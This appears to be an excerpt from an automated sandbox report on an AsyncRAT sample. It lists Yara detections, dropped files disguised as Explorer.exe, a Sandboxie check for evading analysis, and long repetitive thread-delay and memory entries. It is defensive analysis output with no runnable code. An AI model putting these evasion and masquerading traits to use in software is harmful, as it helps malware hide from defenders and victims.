                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rrat.exe.26db1a0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeMemory allocated: 1860000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeMemory allocated: 3460000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeMemory allocated: 1860000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\explore.exeMemory allocated: 1520000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\explore.exeMemory allocated: 30E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\explore.exeMemory allocated: 2FE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599890Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599775Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599671Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599562Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599453Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599343Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599234Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599121Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599015Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598906Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598797Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598687Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598578Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598465Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598282Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597965Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597858Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597747Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597638Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597531Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597421Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597284Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597156Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597010Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596905Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596796Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596687Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596578Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596468Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596329Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596203Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596086Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595984Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595874Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595764Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595330Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595203Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595057Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594952Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594841Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594733Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594613Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594484Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594348Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594218Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594109Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 593890Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 593781Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\explore.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeWindow / User API: threadDelayed 411Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5922Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3754Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeWindow / User API: threadDelayed 3437Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeWindow / User API: threadDelayed 6333Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5852
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3929
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-19226
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe TID: 3628Thread sleep count: 411 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe TID: 3628Thread sleep count: 85 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe TID: 1488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5628Thread sleep count: 5922 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5252Thread sleep count: 3754 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -599890s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -599775s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -599671s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -599562s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -599453s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -599343s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -599234s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -599121s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -599015s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -598906s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -598797s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -598687s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -598578s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -598465s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -598282s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -597965s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -597858s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -597747s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -597638s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -597531s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -597421s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -597284s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -597156s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -597010s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -596905s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -596796s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -596687s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -596578s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -596468s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -596329s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -596203s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -596086s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -595984s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -595874s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -595764s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -595330s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -595203s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -595057s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -594952s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -594841s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -594733s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -594613s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -594484s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -594348s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -594218s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -594109s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -594000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -593890s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7756Thread sleep time: -593781s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7468Thread sleep count: 278 > 30
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7460Thread sleep count: 101 > 30
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe TID: 7444Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\explore.exe TID: 7680Thread sleep count: 300 > 30
                        Source: C:\Users\user\AppData\Local\explore.exe TID: 7664Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 5852 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 3929 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\rrats.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\explore.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA69B
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBC220
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CCB348 FindFirstFileExA,0_2_00CCB348
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E82AF9 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_00E82AF9
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E91260 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_00E91260
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E9FCC8 FindFirstFileExA,4_2_00E9FCC8
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBE6A3 VirtualQuery,GetSystemInfo,0_2_00CBE6A3
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599890Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599775Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599671Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599562Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599453Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599343Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599234Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599121Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 599015Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598906Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598797Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598687Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598578Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598465Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 598282Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597965Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597858Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597747Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597638Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597531Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597421Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597284Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597156Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 597010Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596905Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596796Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596687Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596578Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596468Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596329Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596203Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 596086Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595984Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595874Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595764Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595330Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595203Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 595057Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594952Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594841Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594733Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594613Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594484Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594348Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594218Jump to behavior
